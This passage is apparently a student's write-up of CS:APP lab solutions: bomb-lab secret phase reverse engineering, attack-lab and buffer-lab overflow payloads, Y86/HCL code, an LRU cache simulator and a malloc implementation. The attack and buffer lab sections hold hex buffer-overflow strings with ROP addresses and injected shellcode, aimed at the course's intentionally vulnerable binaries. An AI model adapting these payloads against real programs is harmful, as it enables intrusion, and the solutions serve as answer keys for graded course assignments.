node4
    dd 2B3h
    dd 4
    dq offset node5

node5
    dd 1DDh
    dd 5
    dq offset node6

node6
    dd 1BBh
    dd 6
    dq offset 0

Re-linked.

rcx = *var_20h;
for (i = 1; i < 6; i++) {
    rdx = var_20h[i];
    rcx.next = rdx;
    rcx = rdx;
}

Final check: nodes should be sorted by value.

rbx = *var_20h;
for (ebp = 5; ebp > 0; ebp--) {
    rax = rbx.next;
    eax = rax.value;
    if (rbx.value < eax) explode_bomb();
    rbx = rbx.next;
}

node3 > node4 > node5 > node6 > node1 > node2

Good work!  On to the next...
4 3 2 1 6 5
Congratulations! You've defused the bomb!

Secret Phase

[0x004010f4]> s sym.secret_phase
[0x00401242]> pdf
            ; CALL XREF from sym.phase_defused @ 0x401630(x)
┌ 81: sym.secret_phase ();
│           0x00401242      53             push rbx
│           0x00401243      e856020000     call sym.read_line
│           0x00401248      ba0a000000     mov edx, 0xa                ; int base
│           0x0040124d      be00000000     mov esi, 0                  ; char * *endptr
│           0x00401252      4889c7         mov rdi, rax                ; const char *str
│           0x00401255      e876f9ffff     call sym.imp.strtol         ; long strtol(const char *str, char * *endptr, int base)
│           0x0040125a      4889c3         mov rbx, rax
│           0x0040125d      8d40ff         lea eax, [rax - 1]
│           0x00401260      3de8030000     cmp eax, 0x3e8              ; 1000
│       ┌─< 0x00401265      7605           jbe 0x40126c
│       │   0x00401267      e8ce010000     call sym.explode_bomb
│       │   ; CODE XREF from sym.secret_phase @ 0x401265(x)
│       └─> 0x0040126c      89de           mov esi, ebx                ; int64_t arg2
│           0x0040126e      bff0306000     mov edi, obj.n1             ; 0x6030f0 ; "$" ; int64_t arg1
│           0x00401273      e88cffffff     call sym.fun7
│           0x00401278      83f802         cmp eax, 2                  ; 2
│       ┌─< 0x0040127b      7405           je 0x401282
│       │   0x0040127d      e8b8010000     call sym.explode_bomb
│       │   ; CODE XREF from sym.secret_phase @ 0x40127b(x)
│       └─> 0x00401282      bf38244000     mov edi, str.Wow__Youve_defused_the_secret_stage_ ; 0x402438 ; "Wow! You've defused the secret stage!" ; const char *s
│           0x00401287      e884f8ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0040128c      e833030000     call sym.phase_defused
│           0x00401291      5b             pop rbx
└           0x00401292      c3             ret

[0x00401242]> s sym.fun7
[0x00401204]> pdf
            ; CALL XREFS from sym.fun7 @ 0x401217(x), 0x40122d(x)
            ; CALL XREF from sym.secret_phase @ 0x401273(x)
┌ 62: sym.fun7 (int64_t arg1, signed int64_t arg2);
│           ; arg int64_t arg1 @ rdi
│           ; arg signed int64_t arg2 @ rsi
│           0x00401204      4883ec08       sub rsp, 8
│           0x00401208      4885ff         test rdi, rdi               ; arg1
│       ┌─< 0x0040120b      742b           je 0x401238
│       │   0x0040120d      8b17           mov edx, dword [rdi]        ; arg1
│       │   0x0040120f      39f2           cmp edx, esi                ; arg2
│      ┌──< 0x00401211      7e0d           jle 0x401220
│      ││   0x00401213      488b7f08       mov rdi, qword [rdi + 8]    ; int64_t arg1
│      ││   0x00401217      e8e8ffffff     call sym.fun7
│      ││   0x0040121c      01c0           add eax, eax
│     ┌───< 0x0040121e      eb1d           jmp 0x40123d
│     │││   ; CODE XREF from sym.fun7 @ 0x401211(x)
│     │└──> 0x00401220      b800000000     mov eax, 0
│     │ │   0x00401225      39f2           cmp edx, esi                ; arg2
│     │┌──< 0x00401227      7414           je 0x40123d
│     │││   0x00401229      488b7f10       mov rdi, qword [rdi + 0x10] ; int64_t arg1
│     │││   0x0040122d      e8d2ffffff     call sym.fun7
│     │││   0x00401232      8d440001       lea eax, [rax + rax + 1]
│    ┌────< 0x00401236      eb05           jmp 0x40123d
│    ││││   ; CODE XREF from sym.fun7 @ 0x40120b(x)
│    │││└─> 0x00401238      b8ffffffff     mov eax, 0xffffffff         ; -1
│    │││    ; CODE XREFS from sym.fun7 @ 0x40121e(x), 0x401227(x), 0x401236(x)
│    └└└──> 0x0040123d      4883c408       add rsp, 8
└           0x00401241      c3             ret

Readline and convert to number.

The number should smaller than 1001, and the result of fun7() should be 2.

Arg1 is a root of a tree.

n1
    dq 24h
    dq offset n21
    dq offset n22
    dq 0

n21
    dq 8
    dq offset n31
    dq offset n32
    dq 0

n22
    dq 32h
    dq offset n33
    dq offset n34
    dq 0

n32
    dq 16h
    dq offset n43
    dq offset n44
    dq 0

n33
    dq 2Dh
    dq offset n45
    dq offset n46
    dq 0

n31
    dq 6
    dq offset n41
    dq offset n42
    dq 0

n34
    dq 6Bh
    dq offset n47
    dq offset n48
    dq 0

n45
    dq 28h
    dq 0
    dq 0
    dq 0

n41
    dq 1
    dq 0
    dq 0
    dq 0

n47
    dq 63h
    dq 0
    dq 0
    dq 0

n44
    dq 23h
    dq 0
    dq 0
    dq 0

n42
    dq 7
    dq 0
    dq 0
    dq 0

n43
    dq 14h
    dq 0
    dq 0
    dq 0

n46
    dq 2Fh
    dq 0
    dq 0
    dq 0

n48
    dq 3E9h
    dq 0
    dq 0
    dq 0

The tree:


                      0x24
          v------------|------------v
          8                        0x32
    v-----|------v            v-----|------v
    6           0x16         0x2d         0x6b
v---|---v    v---|---v    v---|---v    v---|---v
1       7   0x14    0x23 0x28    0x2f 0x63   0x3e9

In fun7:

rdi = root;
rsi = input_num;
edx = root.value;
if (edx > rsi) {
    rdi = rdi.lchild;
    return 2 * fun7(rdi, rsi);
}
eax = 0
if (edx == esi) {
    return eax;
}
else {
    rdi = rdi.rchild;
    return 1 + 2 * fun7(rdi, rsi);
}

The target is 2, so we need:

ret 0
ret 1 + 2 * 0
ret 2 * (1 + 2 * 0)

Therefore, the input should be 22.

Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2.  Keep going!
7 327
Halfway there!
0 0 DrEvil
So you got that one.  Try this one.
ionefg
Good work!  On to the next...
4 3 2 1 6 5
Curses, you've found the secret phase!
But finding it and solving it are quite different...
22
Wow! You've defused the secret stage!
Congratulations! You've defused the bomb!

Lab3 Attack-lab

直接使用 ROP 打了

Phase 1

61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61
62 62 62 62 62 62 62 62
C0 17 40 00 00 00 00 00

Phase 2

61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61
62 62 62 62 62 62 62 62
1b 14 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
EC 17 40 00 00 00 00 00

Phase 3

35 39 62 39 39 37 66 61 
00 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61
62 62 62 62 62 62 62 62
1b 14 40 00 00 00 00 00
78 dc 61 55 00 00 00 00
FA 18 40 00 00 00 00 00

Phase 4 和 5 不知道为什么打不通，跳过了

Lab4 Buffer-lab

感觉像另一个版本的 Attack lab

Phase 0

61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
62 62 62 62
18 8C 04 08

Phase 1

61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
62 62 62 62
42 8C 04 08
63 63 63 63
8e 3e aa 69

Phase 2

movl $0x69aa3e8e, 0x0804D100
push $0x08048C9D
ret

c7 05 00 d1 04 08 8e
3e aa 69
68 9d 8c 04 08
c3

61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
62 62 62 62
28 3d 68 55

Phase 3

mov $0x69aa3e8e, %eax
mov $0x55555555, %ebp
push $0x08048DBE
ret

b8 8e 3e aa 69
bd 80 3d 68 55
68 be 8d 04 08
c3

61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
62 62 62 62
28 3d 68 55

Phase 4

mov $0x69aa3e8e, %eax
mov %esp, %ebp
add $0x28, %ebp
push $0x08048DBE
ret

b8 8e 3e aa 69
89 e5
83 c5 28
68 be 8d 04 08
c3

61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61 
61 61 61 61 61 61 61 61

62 62 62 62
48 3b 68 55

Lab5 Arch-lab

Part A

第一部分是使用 Y64 语言写几个程序

写的不规范，能跑就行

sum.ys

    .pos 0
init:
    irmovq Stack, %rsp
    call Main
    halt

Main:
    irmovq ele1, %rdi
    call Sum
    ret

Sum:
    xorq %rax, %rax
    rrmovq %rdi, %rcx
  loop:
    andq %rcx, %rcx
    je end
    mrmovq 0(%rcx), %rbx
    addq %rbx, %rax
    mrmovq 8(%rcx), %rcx
    jmp loop
  end:
    ret

# Sample linked list
.align 8
ele1:
.quad 0x00a
.quad ele2
ele2:
.quad 0x0b0
.quad ele3
ele3:
.quad 0xc00
.quad 0

    .pos 0x200
Stack:

rsum.ys

    .pos 0
init:
    irmovq Stack, %rsp
    call Main
    halt

Main:
    irmovq ele1, %rdi
    xorq %rax, %rax
    call rsum_list
    ret

rsum_list:
  loop:
    andq %rdi, %rdi
    je end
    mrmovq 0(%rdi), %rbx
    pushq %rbx
    mrmovq 8(%rdi), %rdi
    call rsum_list
    popq %rbx
    addq %rbx, %rax
    jmp loop
  end:
    ret

# Sample linked list
.align 8
ele1:
.quad 0x00a
.quad ele2
ele2:
.quad 0x0b0
.quad ele3
ele3:
.quad 0xc00
.quad 0

    .pos 0x200
Stack:

copy.ys

    .pos 0
init:
    irmovq Stack, %rsp
    call Main
    halt

Main:
    irmovq src, %rdi
    irmovq dest, %rsi
    irmovq $3, %rdx
    call copy
    ret

copy:
    irmovq $1, %r8
    irmovq $8, %r9
    xorq %rax, %rax
    rrmovq %rdx, %rcx
  loop:
    mrmovq 0(%rdi), %rbx
    rmmovq %rbx, 0(%rsi)
    xorq %rbx, %rax
    addq %r9, %rdi
    addq %r9, %rsi
    subq %r8, %rcx
    andq %rcx, %rcx
    jne loop
    ret

# Sample linked list
.align 8
# Source block
src:
.quad 0x00a
.quad 0x0b0
.quad 0xc00
# Destination block
dest:
.quad 0x111
.quad 0x222
.quad 0x333

    .pos 0x200
Stack:

Part B

这部分不太会，全靠注释和网上资料做的

参考书上的相似指令，自己画了个整体架构

#############################################
#     Stage    # iaddq V, rB                #
#############################################
#              # icode: ifun <- M_1[PC]     #
# Fetch Stage  # rA: rB      <- M_1[PC + 1] #
#              # valC        <- M_8[PC + 2] #
#              # valP        <- PC + 10     #
#############################################
# Decode Stage # valB <- R[rB]              #
#############################################
# Excuse Stage # valE <- valC + valB        #
#############################################
#   Writeback  #                            #
#     Stage    # R[rB] <- valE              #
#############################################
#   Update PC  # PC <- valP                 #
#############################################

Fetch 阶段

# Determine instruction code
word icode = [
	imem_error: INOP;
	1: imem_icode;		# Default: get from instruction memory
];

# Determine instruction function
word ifun = [
	imem_error: FNONE;
	1: imem_ifun;		# Default: get from instruction memory
];

bool instr_valid = icode in 
	{ INOP, IHALT, IRRMOVQ, IIRMOVQ, IRMMOVQ, IMRMOVQ,
	       IOPQ, IJXX, ICALL, IRET, IPUSHQ, IPOPQ, IIADDQ };

# Does fetched instruction require a regid byte?
bool need_regids =
	icode in { IRRMOVQ, IOPQ, IPUSHQ, IPOPQ, 
		     IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ};

# Does fetched instruction require a constant word?
bool need_valC =
	icode in { IIRMOVQ, IRMMOVQ, IMRMOVQ, IJXX, ICALL, IIADDQ };

Decode 阶段

## What register should be used as the A source?
word srcA = [
	icode in { IRRMOVQ, IRMMOVQ, IOPQ, IPUSHQ  } : rA;
	icode in { IPOPQ, IRET } : RRSP;
	1 : RNONE; # Don't need register
];

## What register should be used as the B source?
word srcB = [
	icode in { IOPQ, IRMMOVQ, IMRMOVQ, IIADDQ  } : rB;
	icode in { IPUSHQ, IPOPQ, ICALL, IRET } : RRSP;
	1 : RNONE;  # Don't need register
];

## What register should be used as the E destination?
word dstE = [
	icode in { IRRMOVQ } && Cnd : rB;
	icode in { IIRMOVQ, IOPQ, IIADDQ} : rB;
	icode in { IPUSHQ, IPOPQ, ICALL, IRET } : RRSP;
	1 : RNONE;  # Don't write any register
];

## What register should be used as the M destination?
word dstM = [
	icode in { IMRMOVQ, IPOPQ } : rA;
	1 : RNONE;  # Don't write any register
];

Execute 阶段

## Select input A to ALU
word aluA = [
	icode in { IRRMOVQ, IOPQ } : valA;
	icode in { IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ } : valC;
	icode in { ICALL, IPUSHQ } : -8;
	icode in { IRET, IPOPQ } : 8;
	# Other instructions don't need ALU
];

## Select input B to ALU
word aluB = [
	icode in { IRMMOVQ, IMRMOVQ, IOPQ, ICALL, 
		      IPUSHQ, IRET, IPOPQ, IIADDQ } : valB;
	icode in { IRRMOVQ, IIRMOVQ } : 0;
	# Other instructions don't need ALU
];

## Set the ALU function
word alufun = [
	icode == IOPQ : ifun;
	1 : ALUADD;
];

## Should the condition codes be updated?
bool set_cc = icode in { IOPQ, IIADDQ };

PC 更新阶段不需要更改

Lab7 Cache-lab

需要实现一个 LRU 的 Cache 系统

不知道该怎么实现，直接逆 csim-ref 加抄网上资料了

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include "cachelab.h"

int s = 0, E = 0, b = 0, v = 0;
char *tracefile = NULL;
int S = 0, B = 0;
int hit_count, miss_count, eviction_count;
unsigned long long lru_counter = 1, set_index_mask;


FILE *fp = NULL;

typedef struct {
    char valid_bit;
    unsigned long long tag;
    unsigned long long lru;
} cache_line_t, *cache_set_t, **cache_t;

cache_t cache;

typedef struct {

} Node;

void printUsage(char *name){
    printf("./%s [-hv] -s <s> -E <E> -b <b> -t <tracefile>", name);
    puts("Options:");
    puts("  -h         Print this help message.");
    puts("  -v         Optional verbose flag.");
    puts("  -s <num>   Number of set index bits.");
    puts("  -E <num>   Number of lines per set.");
    puts("  -b <num>   Number of block offset bits.");
    puts("  -t <file>  Trace file.");
    puts("");
    puts("Examples:");
    puts("  linux>  ./csim-ref -s 4 -E 1 -b 4 -t traces/yi.trace");
    puts("  linux>  ./csim-ref -v -s 8 -E 2 -b 4 -t traces/yi.trace");
}

void initCache() {
    cache = (cache_t)malloc(sizeof(cache_set_t) * S);
    for (int i = 0; i < S; i++) {
        cache[i] = (cache_set_t)malloc(sizeof(cache_line_t) * E);
        for (int j = 0; j < E; j++) {
            cache[i][j].valid_bit = 0;
            cache[i][j].tag = 0;
            cache[i][j].lru = 0;
        }
    }
    set_index_mask = (1 << s) - 1;
    return;
}

void releaseCache() {
    for (int i = 0; i < S; i++) {
        free(cache[i]);
        cache[i] = NULL;
    }
    free(cache);
    cache = NULL;
    return;
}

void accessData(unsigned long long address){
    unsigned int eviction_lru = -1LL;
    unsigned long long eviction_line = 0;
    unsigned long long tag = address >> (s + b);
    cache_set_t cache_set = cache[(address >> b) & set_index_mask];
    int i;
    for (i = 0; ; ++i) {
        if (i >= E) {
            ++miss_count;
            if (v)
                printf("miss ");
            for (int j = 0; j < E; ++j) {
                if (cache_set[j].lru < eviction_lru) {
                    eviction_line = j;
                    eviction_lru = cache_set[j].lru;
                }
            }
            if (cache_set[eviction_line].valid_bit) {
                ++eviction_count;
                if (v) 
                    printf("eviction ");
            }
            cache_set[eviction_line].valid_bit = 1;
            cache_set[eviction_line].tag = tag;
            cache_set[eviction_line].lru = lru_counter++;
            return;
        }
        if (cache_set[i].valid_bit && cache_set[i].tag == tag) {
            break;
        }
    }
    ++hit_count;
    if (v) 
        printf("hit ");
    cache_set[i].lru = lru_counter++;
    return;
}

void replayTrace(FILE* f) {
    unsigned long long address;
    int size;
    char buf[1024];
    while (fgets(buf, 1023, f)) {
        if (buf[1] != 'M' && buf[1] != 'L' && buf[1] != 'S') {
            continue;
        }
        sscanf(buf + 3, "%llx,%u ", &address, &size);
        if (v)
            printf("%c %llx,%u ", buf[1], address, size);
        accessData(address);
        if (buf[1] == 'M') {
            accessData(address);
        }
        if (v) putchar('\n');
    }
    return;
}

int main(int argc, char* argv[]) {
    char o;
    while ((o = getopt(argc, argv, "hvs:E:b:t:")) != -1) {
        switch (o) {
            case 'h':
                printUsage(argv[0]);
                return 0;
            case 'v':
                v = 1;
                break;
            case 's':
                s = atoi(optarg);
                break;
            case 'E':
                E = atoi(optarg);
                break;
            case 'b':
                b = atoi(optarg);
                break;
            case 't':
                tracefile = optarg;
                fp = fopen(tracefile, "r");
                if (fp == NULL) {
                    printf("File %s open failed.", tracefile);
                    return -1;
                }
                break;
            default:
                printUsage(argv[0]);
                return 0;
        }
    }
    if (s <= 0 || E <= 0 || !tracefile || b <= 0) {
        printUsage(argv[0]);
        return -1;
    }
    S = 1 << s;
    B = 1 << b;

    initCache();
    replayTrace(fp);

    printSummary(hit_count, miss_count, eviction_count);

    releaseCache();
    fclose(fp);
    
    return 0;
}

Lab10 Malloc-lab

实现了两种 Malloc

隐式链表

+-----------------+
| chunksize | 00A | A: Alloc
+-----------------+
|    (padding)    |
+-----------------+
| chunksize | 00A | A: Alloc
+-----------------+

宏定义

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

#define WSIZE 4                 /* Word and header/footer size (bytes) */
#define DSIZE 8                 /* Double word size (bytes) */
#define CHUNKSIZE (1 << 12)     /* Extend hea by this amount (bytes) */

#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Pack a size and allocated bit into a word */
#define PACK(size, alloc) ((size) | (alloc))

/* Read and write a word at address p */
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)

/* Given block ptr bp, compute address of its header and footer */
#define HDRP(bp) ((char*)(bp) - WSIZE)
#define FTRP(bp) ((char*)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)

/* Given block ptr bp, compute address of next and previous blocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(((char*)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char*)(bp) - DSIZE)))

用宏定义编译方便一些

#define FIRST_FIT 1
#define NEXT_FIT 2
#define BEST_FIT 3

一些全局变量

static char *heap_listp;

#if FIT_ALGO == NEXT_FIT
char *cur_listp;
#endif

核心代码直接抄书：

/*
 * coalesce - Coalesce free block next by
 */
static void *coalesce(void *bp) {
    size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));

    size_t size = GET_SIZE(HDRP(bp));
    if (prev_alloc && next_alloc)
        return bp;
    if (!next_alloc && prev_alloc) {
        size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
        PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
        PUT(HDRP(bp), PACK(size, 0));
    }
    if (!prev_alloc && next_alloc) {
        size += GET_SIZE(FTRP(PREV_BLKP(bp)));
        PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
        PUT(FTRP(bp), PACK(size, 0));
        bp = PREV_BLKP(bp);
    }
    if (!prev_alloc && !next_alloc) {
        size += GET_SIZE(FTRP(PREV_BLKP(bp)));
        size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
        PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
        bp = PREV_BLKP(bp);
    };

#if FIT_ALGO == NEXT_FIT
    if (cur_listp > bp && cur_listp < NEXT_BLKP(bp))
        cur_listp = bp;
#endif

    return bp;
}

/*
 * extend_heap - extend heap with a free block
 */
static void *extend_heap(size_t words) {
    char *bp;
    size_t size;
    /* Allocate and even number of words to maintain alignment */
    size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;

    /* Initialize free block header/footer and the epilogue header */
    PUT(HDRP(bp), PACK(size, 0));
    PUT(FTRP(bp), PACK(size, 0));
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));

    /* Coalesce if the previous block was free */
    return coalesce(bp);
}

/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    /* Create the initial empty heap */
    if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void *)-1)   /* sbrk() function returns the start address of the new area. */
        return -1;
    PUT(heap_listp, 0);                                     /* Alignment */
    PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1));          /* Prologue block's size is 8 and is always alloced */
    PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1));
    PUT(heap_listp + (3 * WSIZE), PACK(0, 1));              /* Epilogue header */
    heap_listp += (2 * WSIZE);
    
#if FIT_ALGO == NEXT_FIT
    cur_listp = heap_listp;
#endif

    if (extend_heap(CHUNKSIZE/WSIZE) == NULL)
        return -1;
    return 0;
}

/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void *mm_malloc(size_t size)
{
    /* Ignore spurious requests */
    if (size <= 0)
        return NULL;
    if (size <= DSIZE)
        size = 2 * DSIZE;
    size_t newsize = size + DSIZE + ((-size) % DSIZE);
    void* bp;
    // int newsize = ALIGN(size + SIZE_T_SIZE);
    if ((bp = find_fit(newsize)) != NULL) {
        place(bp, newsize);
        return bp;
    }
    size_t extendsize = MAX(newsize, CHUNKSIZE);
    if ((bp = extend_heap(extendsize/WSIZE)) == NULL)
	   return NULL;
    place(bp, newsize);
    return bp;
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *ptr)
{
    size_t size = GET_SIZE(HDRP(ptr));

    PUT(HDRP(ptr), PACK(size, 0));
    PUT(FTRP(ptr), PACK(size, 0));

    coalesce(ptr);
}

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */
void *mm_realloc(void *ptr, size_t size)
{
    void *oldptr = ptr;
    void *newptr;
    size_t copySize;
    
    newptr = mm_malloc(size);
    if (newptr == NULL)
      return NULL;
    size = GET_SIZE(HDRP(oldptr));
    // copySize = *(size_t *)((char *)oldptr - SIZE_T_SIZE);
    copySize = GET_SIZE(HDRP(newptr));
    if (size < copySize)
      copySize = size;
    memcpy(newptr, oldptr, copySize - WSIZE);
    mm_free(oldptr);
    return newptr;
}

书上最后留了两个函数作为例题

static void place(void *bp, size_t size){
    size_t origin_size = GET_SIZE(HDRP(bp));
    if (origin_size - size >= 2 * DSIZE) {
        PUT(HDRP(bp), PACK(size, 1));
        PUT(FTRP(bp), PACK(size, 1));

        PUT(HDRP(NEXT_BLKP(bp)), PACK(origin_size - size, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK(origin_size - size, 0));
    } else {
        PUT(HDRP(bp), PACK(origin_size, 1));
        PUT(FTRP(bp), PACK(origin_size, 1));
    }
    return;
}

实现了三种不同的 fit 算法：

/* 
 * util: 74%
 * secs: 0.4585
 * Perf index = 44 (util) + 16 (thru) = 61 / 100
 */
#if FIT_ALGO == FIRST_FIT
static void *find_fit(size_t size) {
    void *tmp_listp = heap_listp;
    while (GET_SIZE(HDRP(tmp_listp)) < size || GET_ALLOC(HDRP(tmp_listp))) {
        if (GET_SIZE(HDRP(tmp_listp)) == 0) {
            return NULL;
        }
        tmp_listp = NEXT_BLKP(tmp_listp);
    }
    return tmp_listp;
}
/* 
 * util: 73%
 * secs: 0.0918
 * Perf index = 44 (util) + 40 (thru) = 84/100
 */
# elif FIT_ALGO == NEXT_FIT
static void *find_fit(size_t size) {
    void *tmp_listp;
    for (tmp_listp = cur_listp; GET_SIZE(HDRP(tmp_listp)) != 0; tmp_listp = NEXT_BLKP(tmp_listp)) {
        if (!GET_ALLOC(HDRP(tmp_listp)) && GET_SIZE(HDRP(tmp_listp)) >= size) {
            cur_listp = tmp_listp;
            return tmp_listp;
        }
    }
    for (tmp_listp = heap_listp; tmp_listp != cur_listp; tmp_listp = NEXT_BLKP(tmp_listp)) {
        if (!GET_ALLOC(HDRP(tmp_listp)) && GET_SIZE(HDRP(tmp_listp)) >= size) {
            cur_listp = tmp_listp;
            return tmp_listp;
        }
    }
    return NULL;
}
/*
 * util: 75%
 * secs: 0.4660
 * Perf index = 45 (util) + 16 (thru) = 61/100
 */
# elif FIT_ALGO == BEST_FIT
static void *find_fit(size_t size) {
    void *best_listp = NULL;
    size_t best_size = 0x7fffffff;
    for (void *tmp_listp = heap_listp; GET_SIZE(HDRP(tmp_listp)) != 0; tmp_listp = NEXT_BLKP(tmp_listp)) {
        size_t cur_size = GET_SIZE(HDRP(tmp_listp));
        if (!GET_ALLOC(HDRP(tmp_listp)) && cur_size >= size) {
            if (cur_size == size) {
                return tmp_listp;
            }
            if (cur_size < best_size) {
                best_size = cur_size;
                best_listp = tmp_listp;
            }
        }
    }
    return best_listp;
}

# endif

next fit 远高于另外两个算法

分离适配

+-+-+-+-+-+-+-+-+-+-+
| Block Size  | 00A | A: Alloc
+-+-+-+-+-+-+-+-+-+-+
|       pred        |
+-+-+-+-+-+-+-+-+-+-+
|       succ        |
+-+-+-+-+-+-+-+-+-+-+
|      Payload      |
+-+-+-+-+-+-+-+-+-+-+
|      Padding      |
+-+-+-+-+-+-+-+-+-+-+
| Block Size  | 00A | A: Alloc
+-+-+-+-+-+-+-+-+-+-+

新增的宏定义

#define MIN_BLOCK_SIZE 16

/* Given block ptr bp, compute pred and succ block */
#define FD(bp) (*(char**)(bp))
#define BK(bp) (*(char**)((bp) + WSIZE))

/* Given block ptr bp, compute pred and succ ptr address*/
#define FD_PTR(bp) ((char*)(bp))
#define BK_PTR(bp) ((char*)(bp + WSIZE))

#define SET_FD(bp, val) (*(unsigned int*)(bp) = (unsigned int)(val))
#define SET_BK(bp, val) (*(unsigned int*)(bp+WSIZE) = (unsigned int)(val))

需要一个新的全局变量来存储几个链表

#define FREE_LIST_SIZE 10
void *free_lists[FREE_LIST_SIZE] = {NULL};

操作链表的函数

/* Following funcions was method of free_lists */
size_t size_to_type(size_t size) {
    size_t x = 0;
    if   (size < 16)        ;
    else if (size <= 32)    x = 0;
    else if (size <= 64)    x = 1;
    else if (size <= 128)   x = 2;
    else if (size <= 256)   x = 3;
    else if (size <= 512)   x = 4;
    else if (size <= 1024)  x = 5;
    else if (size <= 2048)  x = 6;
    else if (size <= 4096)  x = 7;
    else                    x = 8;
    return x;
}

static void insert_node_to_free_list(void *bp, size_t size){
    size_t list_num = size_to_type(size);
    size_t last_head = (size_t)free_lists[list_num];
    SET_BK(bp, last_head);
    if (last_head != NULL) {
        SET_FD(last_head, bp);
    }
    SET_FD(bp, 0);
    free_lists[list_num] = bp;
    return;
}

static void delete_node_from_free_list(void *bp, size_t size) {
    if (FD(bp) != NULL)
        SET_BK(FD(bp), BK(bp));
    else
        free_lists[size_to_type(size)] = BK(bp);
    if (BK(bp) != NULL)
        SET_FD(BK(bp), FD(bp));
    return;
}

其他函数都需要更改

/* place the block to a free block */
static void place(void *bp, size_t size){
    size_t origin_size = GET_SIZE(HDRP(bp));
    delete_node_from_free_list(bp, origin_size);
    if (origin_size - size >= 2 * DSIZE) {
        PUT(HDRP(bp), PACK(size, 1));
        PUT(FTRP(bp), PACK(size, 1));
        size_t remain_size = origin_size - size;
        PUT(HDRP(NEXT_BLKP(bp)), PACK(remain_size, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK(remain_size, 0));
